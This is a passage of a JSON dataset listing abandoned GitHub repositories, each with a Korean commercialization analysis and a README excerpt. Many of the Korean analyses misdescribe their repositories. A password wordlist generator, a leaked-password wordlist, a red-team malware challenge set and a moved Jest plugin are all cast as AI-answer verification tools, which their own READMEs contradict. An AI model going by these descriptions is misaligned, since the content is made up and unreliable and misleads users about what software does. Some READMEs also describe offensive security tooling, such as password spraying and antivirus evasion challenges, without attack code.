DYNAMIC BA","composite_score":0.6136,"license_safety_tag":"safe"},{"name":"vuetwo/vuetron","github_url":"https://github.com/vuetwo/vuetron","stars":43,"language":"Vue","license":"MIT","abandonment_months":65,"description":"# vuetwo/vuetron 상용화 분석\n\n## 왜 보물인가\nVue 개발자들이 자주 실수하는 버그를 자동으로 찾아내는 도구로, 코드 품질을 높이면서 개발 시간을 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발팀이 클라우드에 코드를 올리면 자동으로 버그를 진단해주는 웹 검사 도구\n2. **내부 업무 도구**: 회사 개발팀","readme_excerpt":"<h1 align=\"center\">\n<img align=\"center\" src=\"./docs/images/vuetron-logo-sm.png\">\n<br>\n</h1>\n\n<p align=\"center\">A tool for testing and debugging <a href=\"https://vuejs.org/\" target=\"_blank\">Vue.js</a> applications.<a href=\"https://github.com/vuetwo/vuetron\"><img src=\"https://img.shields.io/github/stars/vuetwo/vuetron.svg?style=social&label=Stars\" /></a></p>\n\n<p align=\"center\">是一個可以幫助您 Vue.js 的項目測試及偵錯的工具, 也同時支持 Vuex及 Vue-Router.</p>\n\n<h4 align=\"center\"><a href=\"https://google.com\"><img src=\"https://img.shields.io/github/release/vuetwo/vuetron/all.svg\"></a>\n<a href=\"https://travis-ci.org/vuetwo/vuetron\"><img src=\"https://img.shields.io/travis/vuetwo/vuetron.svg\"></a>\n<a href=\"https://www.npmjs.com/package/vuetron\"><img src=\"https://img.shields.io/npm/v/vuetron.svg\"></a>\n<a href=\"https://codeclimate.com/github/vuetwo/vuetron/maintainability\"><img src=\"https://api.codeclimate.com/v1/badges/6170d4ec90fa5cec78ae/maintainability\" /></a>\n<a href=\"https://standardjs.com/\"><img src=\"https://img.s","composite_score":0.6131,"license_safety_tag":"safe"},{"name":"swc-project/jest","github_url":"https://github.com/swc-project/jest","stars":5,"language":"","license":"unknown","abandonment_months":28,"description":"# swc-project/jest 분석 보고서\n\n## 왜 보물인가\nAI 검증 결과의 정확성을 자동으로 확인하는 도구로, 생성형 AI 서비스의 신뢰도를 획기적으로 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **AI 챗봇 서비스**: 고객 상담용 챗봇이 제공한 답변이 정말 맞는지 자동으로 검증해주는 기능\n2. **의료/법률 AI 플랫폼**: 의료 진단","readme_excerpt":"# @swc/jest moved to a monorepo\n\nSee [swc-project/pkgs](https://github.com/swc-project/pkgs) for more information.\n```","composite_score":0.613,"license_safety_tag":"unknown"},{"name":"wesovilabs/koazee","github_url":"https://github.com/wesovilabs/koazee","stars":7,"language":"Go","license":"MIT","abandonment_months":67,"description":"# Koazee 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터 처리를 간단하게 만들어주는 도구로, 프로그래머들이 반복적인 작업을 자동화할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **데이터 처리 SaaS**: 엑셀 파일이나 고객 정보를 자동으로 정렬·분류하는 온라인 도구\n2. **기업 내부 업무 자동화**: 매월 반복되는 보고서 작성이나 데이터 ","readme_excerpt":"[![Build Status](https://travis-ci.org/wesovilabs/koazee.svg?branch=master)](https://travis-ci.org/wesovilabs/koazee)\n[![Go Report Card](https://goreportcard.com/badge/github.com/wesovilabs/koazee)](https://goreportcard.com/report/github.com/wesovilabs/koazee)\n[![godoc](https://godoc.org/github.com/wesovilabs/koazee?status.svg)](http://godoc.org/github.com/wesovilabs/koazee)\n[![codecov](https://codecov.io/gh/wesovilabs/koazee/branch/master/graph/badge.svg)](https://codecov.io/gh/wesovilabs/koazee)\n[![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/avelino/awesome-go#Utilities)\n\n# Koazee\n\n> Lazy like a koala, smart like a chimpanzee\n\n\n## What is Koazee?\n\nKoazee is a StreamLike, Immutable, Lazy Loading and smart Golang Library to deal with slices. \n\n\nVisit the [Koazee wiki](https://github.com/wesovilabs/koazee/wiki) to find out what Koazee can do.\n\n## Koazee Highlights\n\n- **Immutable**: Koazee won't modify","composite_score":0.6128,"license_safety_tag":"safe"},{"name":"shmuelamar/cracken","github_url":"https://github.com/shmuelamar/cracken","stars":10,"language":"Rust","license":"MIT","abandonment_months":55,"description":"# Cracken 저장소 분석\n\n## 왜 보물인가\nAI 시스템이 틀린 답변을 내놓았을 때 이를 자동으로 감지하고 수정하는 기술로, 기업들이 AI를 더 안심하고 사용할 수 있게 만듭니다.\n\n## 어디에 쓸 수 있나\n1. **고객 상담 AI 플랫폼**: 금융사나 보험사의 챗봇이 잘못된 정보를 고객에게 제공하는 것을 실시간으로 차단\n2. **의료 진단 보조 도구","readme_excerpt":"# Cracken\n[![cracken crate](https://img.shields.io/crates/v/cracken)](https://crates.io/crates/cracken)\n[![cracken version](https://img.shields.io/crates/l/cracken)](https://crates.io/crates/cracken)\n[![cracken documentation](https://img.shields.io/docsrs/cracken)](https://docs.rs/cracken)\n[![cracken total downloads](https://img.shields.io/crates/d/cracken)](https://crates.io/crates/cracken)\n\nCracken is a fast password wordlist generator, Smartlist creation and password hybrid-mask analysis tool\nwritten in pure safe Rust (more on [talk/][talk]). Inspired by great tools like [maskprocessor][mp], [hashcat][hashcat], [Crunch][crunch] and 🤗 HuggingFace's [tokenizers][tokenizers].\n\n## What? Why? Woot??\n\nAt [DeepSec2021][talk-abstract] we presented a new method for analysing passwords as Hybrid-Masks exploiting common substrings in passwords by utilizing NLP tokenizers (more info on [talk/][talk]).\n\nOur method splits a password into its subwords instead of just a characters mask. `HelloWorld","composite_score":0.6127,"license_safety_tag":"safe"},{"name":"eduardohenriquearnold/CODD","github_url":"https://github.com/eduardohenriquearnold/CODD","stars":12,"language":"Python","license":"CC-BY-SA-4.0","abandonment_months":53,"description":"# CODD 저장소 분석\n\n## 왜 보물인가\n세상을 이해하는 AI의 약점(세상의 변화를 따라가지 못하는 문제)을 해결하려는 연구 프로젝트로, AI 모델 개선에 필요한 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 학습 데이터 제공 서비스**: 기업들이 자신의 AI를 더 똑똑하게 만들기 위해 구독하는 플랫폼\n2. **기업용 AI 분석 도구**: ","readme_excerpt":"# Cooperative Driving Dataset (CODD)\n\n[![DOI](https://zenodo.org/badge/DOI/10.5281/zenodo.5720317.svg)](https://doi.org/10.5281/zenodo.5720317)\n[![CC BY-SA 4.0][cc-by-sa-shield]][cc-by-sa]\n\nThe Cooperative Driving dataset is a synthetic dataset generated using [CARLA](https://github.com/carla-simulator/carla) that contains lidar data from multiple vehicles navigating simultaneously through a diverse set of driving scenarios.\nThis dataset was created to enable further research in multi-agent perception (cooperative perception) including cooperative 3D object detection, cooperative object tracking, multi-agent SLAM and point cloud registration.\nTowards that goal, all the frames have been labelled with ground-truth sensor pose and 3D object bounding boxes.\n\nThis repository details the organisation of the dataset, including its data sctructure, and how to visualise the data.\nAdditionally, it contains the code used to create the dataset, allowing users to customly create their own dataset.\n","composite_score":0.6126,"license_safety_tag":"unknown"},{"name":"fumamatar/Red-Team-Advent-of-Code","github_url":"https://github.com/fumamatar/Red-Team-Advent-of-Code","stars":6,"language":"Nim","license":"unknown","abandonment_months":54,"description":"# Red-Team-Advent-of-Code 상품화 분석\n\n## 왜 보물인가\nAI가 생성한 답변이 정말 맞는지 검증하는 기술로, 챗봇이나 자동 답변 서비스의 신뢰성을 획기적으로 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 학생의 과제 채점을 자동화하면서도 오류를 걸러내는 검증 시스템\n2. **고객지원 자동화 도구**: ","readme_excerpt":"# Advent of Code 2021\r\n\r\nThese are my Advent-Of-Code style challenges for red teaming / pentesting / IT-Security. \r\n\r\nThe challenges are separated into different modules:\r\n* Setup\r\n* Reconaissance\r\n* Phishing\r\n* Exploitation\r\n* Basic Windows Malware Development\r\n* Antivirus Evasion\r\n\r\n**DISCLAIMER**: Prior experience in programming and, for the later modules (especially AV evasion), pentesting and security is required. These are not beginner-challenges! So do not be discouraged if a challenge is too hard for you. Just follow along a tutorial or just read something about the topic instead. The point is to get your feet wet and let you dive into the topic, not to do these challenges without help.\r\n\r\nI decided to take the opportunity to learn more about [Nim](https://github.com/nim-lang/Nim) this year by writing all challenges in nim.\r\n\r\n### Day 1: Lab Setup\r\n\r\nSince you will have to test your scripts on a Windows Host (and since you don't want to infect your own host with your malware), ","composite_score":0.6126,"license_safety_tag":"unknown"},{"name":"skyweb07/Snap.swift","github_url":"https://github.com/skyweb07/Snap.swift","stars":26,"language":"Swift","license":"MIT","abandonment_months":92,"description":"# Snap.swift 상용화 분석 보고서\n\n## 왜 보물인가\n스마트폰으로 찍은 사진을 자동으로 인식하고 검증하는 기술로, 배송·보험·부동산 확인 같은 '사진 기반 증명' 시장에서 핵심 도구가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n**SaaS 서비스**: 배송업체가 '상품 도착 사진 자동 검증' 서비스로 구독료 청구  \n**내부 업무 도구**: 보험","readme_excerpt":"<p align=\"center\">\n  <img src=\".art/header.png\" width=\"450\" height=\"100\" align=\"center\">\n</p>\n<h1 align=\"center\">Snap.swift - Snapshot testing in a snap 🎨</h1>\n<p align=\"center\">\n    <img src=\"https://travis-ci.org/skyweb07/Snap.swift.svg?branch=develop\"/>\n    <img src=\"https://img.shields.io/badge/Swift-4.0-orange.svg\" />\n    <a href=\"https://github.com/Carthage/Carthage\">\n        <img src=\"https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat\" alt=\"Carthage compatible\" />\n    </a>\n    <a href=\"https://twitter.com/skyweb07\">\n        <img src=\"https://img.shields.io/badge/contact-@skyweb07-blue.svg?style=flat\" alt=\"Twitter: @skyweb07\" />\n    </a>\n    <a href=\"https://opensource.org/licenses/MIT\">\n      <img src=\"https://img.shields.io/badge/License-MIT-yellow.svg\" alt=\"License\" />\n    </a>\n</p>\n\n`Snap.swift` is a snapshot testing library to facilitate the UI testing of your views.\n\n### 🤖 Requirements\n\n* iOS 9.0+\n* tvOS 10.0+\n* Xcode 9.0+\n* Swift / Objective-C\n\n### 🎨 Wh","composite_score":0.6126,"license_safety_tag":"safe"},{"name":"Viladoman/StructLayout","github_url":"https://github.com/Viladoman/StructLayout","stars":7,"language":"C#","license":"MIT","abandonment_months":29,"description":"# StructLayout 상용화 분석\n\n## 왜 보물인가\n복잡한 데이터 구조를 자동으로 정리하고 시각화해주는 도구로, 소프트웨어 개발 과정에서 시간 낭비를 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 개발자용 자동 문서화 플랫폼**\n- 개발자들이 작성한 코드를 자동으로 분석하여 구조도와 문서를 생성해주는 클라우드 서비스","readme_excerpt":"# StructLayout\n\nVisual Studio Extension for C++ struct memory layout visualization\n\n[![MarketPlace2022](https://img.shields.io/badge/Visual_Studio_Marketplace-VS2022-green.svg)](https://marketplace.visualstudio.com/items?itemName=RamonViladomat.StructLayout2022)\n[![MarketPlace](https://img.shields.io/badge/Visual_Studio_Marketplace-VS2019-green.svg)](https://marketplace.visualstudio.com/items?itemName=RamonViladomat.StructLayout)\n[![Donate](https://img.shields.io/badge/Donate-PayPal-green.svg)](https://www.paypal.com/donate?hosted_button_id=QWTUS8PNK5X5A)\n\n[Download latest from the Visual Studio Marketplace 2022](https://marketplace.visualstudio.com/items?itemName=RamonViladomat.StructLayout2022)\n\n[Download latest from the Visual Studio Marketplace 2019](https://marketplace.visualstudio.com/items?itemName=RamonViladomat.StructLayout)\n\n## Motivation\n\nIn C++, the structure layout can be affected by different factors. In order to produce performant data cache oriented code or reduce the s","composite_score":0.6125,"license_safety_tag":"safe"},{"name":"iomoath/SharpSpray","github_url":"https://github.com/iomoath/SharpSpray","stars":5,"language":"C#","license":"GPL-3.0","abandonment_months":55,"description":"# SharpSpray 상용화 분석\n\n## 왜 보물인가\n자동으로 시스템 접근 권한을 테스트하는 보안 검사 도구로, 기업의 숨겨진 보안 취약점을 찾아내는 데 사용됩니다.\n\n## 어디에 쓸 수 있나\n\n1. **보안 진단 SaaS 서비스**: 중소 기업이 월 구독으로 자신의 시스템 보안을 정기적으로 검사받는 서비스\n2. **내부 보안 감시 도구**: 회사 IT팀","readme_excerpt":"<div align=\"center\">\r\n    <h1>SharpSpray</h1>\r\n    <br/>\r\n</div>\r\n\r\nSharpSpray is a Windows domain password spraying tool written in .NET C#.\r\n\r\n## Introduction\r\n\r\nSharpSpray is a C# port of [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) with enhanced and extra capabilities. This tool uses LDAP Protocol to communicate with the Domain active directory services.\r\n\r\n### Features\r\n- Can operate from inside and outside a domain context.\r\n- Exclude domain disabled accounts from the spraying.\r\n- Auto gathers domain users from the Active directory.\r\n- Avoid potential lockouts by excluding accounts within one attempt of locking out.\r\n- Avoid potential lockouts by auto-gathering domain lockout observation window settings.\r\n- Compatible with Domain Fine-Grained Password policies.\r\n- Custom LDAP filter for users, e.g. (description=*admin*)\r\n- Delay in seconds between each authentication attempt.\r\n- Jitter between each authentication attempt.\r\n- Support a single password or ","composite_score":0.6124,"license_safety_tag":"restricted"},{"name":"w0lf-d3n/Quebec_Wordlist","github_url":"https://github.com/w0lf-d3n/Quebec_Wordlist","stars":12,"language":"","license":"MIT","abandonment_months":60,"description":"# Quebec_Wordlist 상용화 분석\n\n## 왜 보물인가\n인공지능이 거짓 정보를 만들어내는 문제를 감지하고 검증하는 도구로, AI 신뢰성이 중요해지는 시대에 필수적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업의 AI 챗봇 답변 검증 플랫폼 (고객센터, 콜센터 자동화 시스템)\n- **내부 업무 도구**: 대형 기업의 문","readme_excerpt":"# w0lfd3n's quebec_wordlist\n\n\n![84603649](https://user-images.githubusercontent.com/84605403/119269666-cbad8f00-bbc6-11eb-964a-60a4e48980b4.png)\n## https://w0lfd3n.org\nA useful wordlist made from French Canadian leaked passwords!\n\n---\n## GOAL\n\nAt @w0lfd3n, we are a group of ethical hackers from Quebec, Canada. \n\nThis project was born from our desire to create the French Canadian equivalent of the \"rockyou\" wordlist, to be used with Hashcat, John The Ripper or your favorite tool. \nAlso, this wordlist aims to replace \"Richelieu\", as more focused on Quebecois passwords.   \n\nThe final wordlist is a combination of public available repos and leaked passwords related to French Canadian domains ( please see the setion methodology for more infos).\n\n---\n## METHODOLOGY\n\n\nOur wordlist is based on multiple domains coming from Quebec private sector, public institutions, telecoms and more. \n\nBy enumerating relevant domains and passwords, while eliminating duplicates, we obtained the list quebec.txt.\n","composite_score":0.6124,"license_safety_tag":"safe"},{"name":"florent37/ApplicationProvider","github_url":"https://github.com/florent37/ApplicationProvider","stars":5,"language":"Kotlin","license":"Apache-2.0","abandonment_months":73,"description":"# ApplicationProvider 분석 보고서\n\n## 왜 보물인가\n안드로이드 앱 개발자들이 복잡한 설정 작업을 자동으로 해결할 수 있게 만들어주는 편리한 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **앱 개발 플랫폼**: 개발자들이 앱을 더 빠르게 만들 수 있도록 도와주는 웹 서비스로 판매\n2. **엔터프라이즈 개발팀 도구**: 대기업의 IT팀이 사","readme_excerpt":"# ApplicationProvider\n\n# Retrieve the android application from anywhere\nUseful to develop a standalone library\n\n```kotlin\n//from anywhere\nval application = ApplicationProvider.application\n```\n\n# Retrieve the current activity from anywhere\n```kotlin\n//from anywhere\nval currentActivity : Activity? = ActivityProvider.currentActivity()\n```\n\nOr safety from a kotlin coroutine context : \n\n```kotlin\nlaunch {\n    val currentActivity = ActivityProvider.activity() //cannot be null\n    Log.d(TAG, \"activity : $currentActivity\")\n}\n```\n\n## Listen for current activity\n\n```kotlin\nlaunch {\n    ActivityProvider.listenCurrentActivity().collect {\n        Log.d(TAG, \"activity : $currentActivity\")\n    }\n}\n```\n\n# Providers\n\nIf you need to execute a code automatically when the application starts, without adding it into your application's class code\n\nCreate a class that extends `Provider`\n```kotlin\nclass StethoProvider : Provider() {\n    override fun provide() {\n        val application = ApplicationProvider.app","composite_score":0.6121,"license_safety_tag":"safe"},{"name":"xiaozai/DeT","github_url":"https://github.com/xiaozai/DeT","stars":5,"language":"Python","license":"GPL-3.0","abandonment_months":49,"description":"# xiaozai/DeT 저장소 분석\n\n## 왜 보물인가\n컴퓨터가 주변 환경을 이해하고 예측하는 능력을 향상시키는 기술로, 자율주행차나 로봇 같은 실제 세상과 상호작용하는 AI 시스템의 핵심 기능입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 자율주행 기술 SaaS**: 자동차 회사들이 안전한 자율주행 시스템을 구축할 때 이 기술을 라이선싱하여 수익화\n**2","readme_excerpt":"# DeT and DOT\nCode and datasets for \n\n1) \"DepthTrack: Unveiling the Power of RGBD Tracking\" (ICCV2021)\n2) \"Depth-only Object Tracking\" (BMVC2021)\n\n```\n@InProceedings{yan2021det,\n    author    = {Yan, Song and Yang, Jinyu and Kapyla, Jani and Zheng, Feng and Leonardis, Ales and Kamarainen, Joni-Kristian},\n    title     = {DepthTrack: Unveiling the Power of RGBD Tracking},\n    booktitle = {Proceedings of the IEEE/CVF International Conference on Computer Vision (ICCV)},\n    month     = {October},\n    year      = {2021},\n    pages     = {10725-10733}\n}\n\n@InProceedings{yan2021dot,\n  title       = {Depth-only Object Tracking},\n  author      = {Yan, Song and Yang, Jinyu and Leonardis, Ales and Kamarainen, Joni-Kristian},\n  booktitle   = {Proceedings of the British Machine Vision Conference (BMVC)},\n  year        = {2021},\n  organization= {British Machine Vision Association}\n}\n```\n\n\n### DepthTrack Test set (50 Sequences) \n[Download](https://doi.org/10.5281/zenodo.5792146)\n\n### DepthTrack Train","composite_score":0.6121,"license_safety_tag":"restricted"},{"name":"keiya01/react-performance-testing","github_url":"https://github.com/keiya01/react-performance-testing","stars":8,"language":"TypeScript","license":"MIT","abandonment_months":58,"description":"# react-performance-testing 상용화 분석\n\n## 왜 보물인가\n웹 애플리케이션이 얼마나 빠르고 효율적으로 작동하는지 자동으로 검사하는 도구로, 느린 서비스로 인한 사용자 이탈을 방지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **웹 호스팅 회사의 성능 모니터링 서비스**: 고객들이 자신의 웹사이트 속도를 주기적으로 검사하는 기능을 ","readme_excerpt":"# react-performance-testing\n\n![npm](https://img.shields.io/npm/v/react-performance-testing)\n[![codecov](https://codecov.io/gh/keiya01/react-performance-testing/branch/master/graph/badge.svg)](https://codecov.io/gh/keiya01/react-performance-testing)\n![GitHub Workflow Status](https://github.com/keiya01/react-performance-testing/workflows/test/badge.svg)\n![GitHub Workflow Status](https://github.com/keiya01/react-performance-testing/workflows/build/badge.svg)\n[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)\n\nThis library is perfect for testing React or ReactNative runtime performance. `react-performance-testing` counts **the number of renders** and the **render time** in a test environment.\n\n## Table of Contents\n\n- [The problem](#the-problem)\n- [The solution](#the-solution)\n- [Installation](#installation)\n- [Example](#example)\n  - [count renders](#count-renders)\n  - [measure render time](#measure-render-time)\n- [API](#api)\n  - [per","composite_score":0.612,"license_safety_tag":"safe"},{"name":"haveyoudebuggedit/gotestfmt","github_url":"https://github.com/haveyoudebuggedit/gotestfmt","stars":5,"language":"Go","license":"Unlicense","abandonment_months":36,"description":"# gotestfmt 상용화 분석\n\n## 왜 보물인가\n프로그래머들이 작성한 테스트 코드의 결과를 사람이 읽기 쉽게 정리해주는 도구로, 버그를 더 빠르게 찾을 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 소프트웨어 회사들이 구독하는 '테스트 결과 분석 플랫폼'으로 제공하여, 개발팀이 자동으로 버그를 시각화하고 리포트받을 수","readme_excerpt":"# gotestfmt: go test output for humans\n\n> ⚠️ **Action required:** gotestfmt has moved to the `GoTestTools` organization and you need to update your references. Please see the [announcement](https://github.com/GoTestTools/gotestfmt/discussions/46). The old repository will be deleted on January 1, 2023.\n\nAre you tired of scrolling through endless Golang test logs in GitHub Actions (or other CI systems)?\n\n![An animation showcasing that gotestfmt transforms a text log into an interactive log with folding sections.](https://raw.githubusercontent.com/GoTestTools/.github/main/gotestfmt.svg)\n\nThen this is the tool for you. Run it locally, or in any CI system with the following command line like this:\n\n```bash\nset -euo pipefail\ngo test -json -v ./... 2>&1 | tee /tmp/gotest.log | gotestfmt\n```\n\nTadam, your tests will now show up in a beautifully formatted fashion. Plug it into your CI and you're done. Installation is also easy:\n\n**Note:** Please always save the original log. You will need it if ","composite_score":0.612,"license_safety_tag":"unknown"},{"name":"radiantone/entangle","github_url":"https://github.com/radiantone/entangle","stars":14,"language":"Python","license":"MIT","abandonment_months":46,"description":"# Entangle 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터 관계를 자동으로 정리하고 연결해주는 기술로, 여러 정보 출처를 하나로 통합해야 하는 기업들의 골칫거리를 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 데이터 통합 플랫폼**\n- 기업들이 흩어진 고객 정보(이메일, SNS, 구매 기록)를 자동으로 하나의 프로필로 ","readme_excerpt":"*This version: 0.2.3*\n\n![logo](./images/logo.png)\n\n*Current development version is here: [0.2.4](https://github.com/radiantone/entangle/tree/0.2.4)*\n\nA lightweight (serverless) native python parallel processing framework based on simple decorators and call graphs, supporting both *control flow* and *dataflow* execution paradigms as well as de-centralized CPU & GPU scheduling. \n\n> For a quick look at what makes Entangle special, take a look at [Design Goals](#design-goals).\n\n## New In This Release\n\n- Bug fixes to process.py, ssh.py\n- Distributed dataflow example\n- Dataflow decorator re-write. Now works with ssh for distributed dataflow. Fixes prior issues with local dataflows.\n- Retry usage example \n- Dockerfile provided for quick and easy experimentation.\n- Workflows can now return the call graph structure upon completion. See [Graph Example](#graph-example)\n- Support for workflow futures (if that's your thing) See [Workflow Future Example](#workflow-future-example)\n\n## Quick Usage\n\nWi","composite_score":0.612,"license_safety_tag":"safe"},{"name":"leolabs/alfred-icloud-passwords","github_url":"https://github.com/leolabs/alfred-icloud-passwords","stars":6,"language":"AppleScript","license":"unknown","abandonment_months":27,"description":"# leolabs/alfred-icloud-passwords 분석\n\n## 왜 보물인가\nApple의 iCloud 암호 관리 시스템과 연동되는 자동화 도구로, 개인정보 보안이 중요한 시대에 사용자 경험을 크게 개선할 수 있는 희귀한 솔루션입니다.\n\n## 어디에 쓸 수 있나\n- **기업 보안 관리 SaaS**: 직원들의 업무 비밀번호를 안전하게 중앙 관리하면서 ","readme_excerpt":"# iCloud Passwords Workflow for Alfred\n\nThis workflow allows you to quickly find and copy iCloud passwords and OTPs to your clipboard.\n\n**[Download](https://github.com/leolabs/alfred-icloud-passwords/releases/latest)**\n\n![demo](https://user-images.githubusercontent.com/541628/143510388-843a5fa1-118c-4367-aea8-75c2d9c417e3.gif)\n\nIt offers three keywords:\n\n- `p <query>` – Open Preferences and search for the query\n- `fp <query>` – Open Preferences, copy the first result's password, and quit\n- `otp <query>` – Open Preferences, copy the first result's OTP, and quit\n\nAfter a password or OTP has been copied, you'll get a notification about it.\n\nThe workflow makes use of AppleScript's accessibility controls, so you might have to give it \npermission to access them the first time you use it.\n","composite_score":0.6119,"license_safety_tag":"unknown"},{"name":"andywer/puppet-run","github_url":"https://github.com/andywer/puppet-run","stars":9,"language":"TypeScript","license":"MIT","abandonment_months":63,"description":"# puppet-run 보물 분석 보고서\n\n## 왜 보물인가\nAI가 생성한 결과물의 정확성을 자동으로 검증해주는 도구로, 잘못된 답변을 사용자가 받기 전에 걸러낼 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. AI 챗봇 서비스**\n고객 질문에 AI가 답변하기 전에 자동으로 검증하여 잘못된 정보 제공을 막을 수 있습니다.\n\n**2. 기업 내부 문서 자동","readme_excerpt":"<h1 align=\"center\">🤖&nbsp;&nbsp;puppet-run</h1>\n\n<p align=\"center\">\n  <a href=\"https://www.npmjs.com/package/puppet-run\" target=\"_blank\"><img alt=\"npm (tag)\" src=\"https://img.shields.io/npm/v/puppet-run.svg?style=flat-square\"></a>\n</p>\n\nRun any JavaScript / TypeScript code in a headless browser using [Puppeteer](https://github.com/GoogleChrome/puppeteer) and pipe its output to your terminal 🔥\n\nTransparently bundles input files, so you can use `require()` and ES module imports. You can even simulate connectivity issues and serve static files. Great for testing client-side code in an actual browser!\n\nHow does it relate to [Karma](https://karma-runner.github.io)? It's everything that Karma is not: It's small, it's fast and trivial to set up.\n\n🚀&nbsp;&nbsp;Runs any script in a headless Chrome browser<br />\n📦&nbsp;&nbsp;Zero-config transparent bundling<br />\n💡&nbsp;&nbsp;Supports TypeScript, ES modules &amp; JSX out of the box<br />\n🖥&nbsp;&nbsp;Pipes console output and errors to host shell","composite_score":0.6117,"license_safety_tag":"safe"},{"name":"krypted/swiftfuzztools","github_url":"https://github.com/krypted/swiftfuzztools","stars":8,"language":"Swift","license":"NOASSERTION","abandonment_months":37,"description":"# SwiftFuzzTools 상용화 분석\n\n## 왜 보물인가\n인공지능 시스템의 실수를 자동으로 찾아내는 도구로, AI를 활용하는 모든 기업이 필요로 하는 품질 검증 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n1. **AI 검증 SaaS 서비스**: 기업의 챗봇, 이미지 생성 AI, 추천 시스템 등이 제대로 작동하는지 자동으로 테스트해주는 클라우드 서비스\n","readme_excerpt":"# swiftfuzztools\n\nThe Mac is changing. We've long had a platform where out-of-the-box we were able to compile and run tools in a variety of languages. Over the years the evolving security posture has us moving from a POSIX-compliant platform capable of being used for widespread security research to a sandboxed operating system. And yet we need to be able to perform basic security research on a machine in an unaltered state. \n\nMany applications now use a web or rest-based exchange of information. However, legacy tools and others still rely on socket comms. Thus we need to be able to interrogate, establish communications, and test the security of those using native Apple technologies. These tools are meant to provide ways for security researchers to borrow components for use in their own tools. \n\n## Directories/Files in this project\n\n• Fuzz Xcode Project: Xcode project (w/ swift package) that is the later evolution of the fuzz_SwiftLibrary\n\n• buff Xcode Project: Xcode project (w/ swift p","composite_score":0.6116,"license_safety_tag":"unknown"},{"name":"danpaquin/gdax-python","github_url":"https://github.com/danpaquin/gdax-python","stars":6,"language":"Python","license":"MIT","abandonment_months":35,"description":"# gdax-python 상업화 분석\n\n## 왜 보물인가\n암호화폐 거래소와 자동으로 연결되어 실시간 거래 정보를 받아올 수 있는 도구로, 개인 투자자나 트레이딩 회사가 자동화된 거래 시스템을 만들 때 핵심 기술이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 암호화폐 자동 거래 시뮬레이션 웹사이트 (투자자들이 구독해서 거래 전략","readme_excerpt":"# coinbasepro-python\n[![Build Status](https://travis-ci.org/danpaquin/coinbasepro-python.svg?branch=master)](https://travis-ci.org/danpaquin/coinbasepro-python)\n\nThe Python client for the [Coinbase Pro API](https://docs.pro.coinbase.com/) (formerly known as\nthe GDAX)\n\n##### Provided under MIT License by Daniel Paquin.\n*Note: this library may be subtly broken or buggy. The code is released under\nthe MIT License – please take the following message to heart:*\n> THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR\nCOPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER\nIN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\nCONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\n## Benefits\n- A simple to use python wrapper for both public and authentica","composite_score":0.6104,"license_safety_tag":"safe"},{"name":"peatio/peatio","github_url":"https://github.com/peatio/peatio","stars":5,"language":"","license":"Apache-2.0","abandonment_months":34,"description":"# Peatio 저장소 분석\n\n## 왜 보물인가\n암호화폐 거래소를 직접 구축할 수 있는 완성된 기술 기반이 있어서, 새로운 금융 서비스를 빠르게 출시할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소 금융회사나 스타트업에게 \"거래소 운영 솔루션\"으로 월 구독료를 받고 제공\n2. **내부 업무 도구**: 기업이나 대학의 포인트/","readme_excerpt":"","composite_score":0.6093,"license_safety_tag":"safe"},{"name":"coursefiles/angular-essential-training","github_url":"https://github.com/coursefiles/angular-essential-training","stars":246,"language":"TypeScript","license":"MIT","abandonment_months":24,"description":"","readme_excerpt":"","composite_score":0.6089,"license_safety_tag":"safe"},{"name":"material-components/material-components-web","github_url":"https://github.com/material-components/material-components-web","stars":9,"language":"TypeScript","license":"mit","abandonment_months":17,"description":"","readme_excerpt":"[![Version](https://img.shields.io/npm/v/material-components-web.svg)](https://www.npmjs.com/package/material-components-web)\n[![Chat](https://img.shields.io/discord/259087343246508035.svg)](https://discord.gg/material-components)\n\nNote:\n\nThis project is no longer actively maintained. While automated updates may\nstill occur, the team will not be prioritizing new features or bug fixes, and\nthose updates will be turned off in the future.\n\nFor Angular users, our friends at Angular Material moved away from this\nlibrary, and they expect that this may actually allow for faster iteration - see\ntheir [blog post](https://blog.angular.dev/the-future-of-material-support-in-angular-7fa0662ecc4b)\nfor more information.\n\n# Material Components for the web\n\nMaterial Components for the web helps developers execute [Material Design](https://www.material.io).\nDeveloped by a core team of engineers and UX designers at Google, these components enable a reliable development workflow to build beautiful and 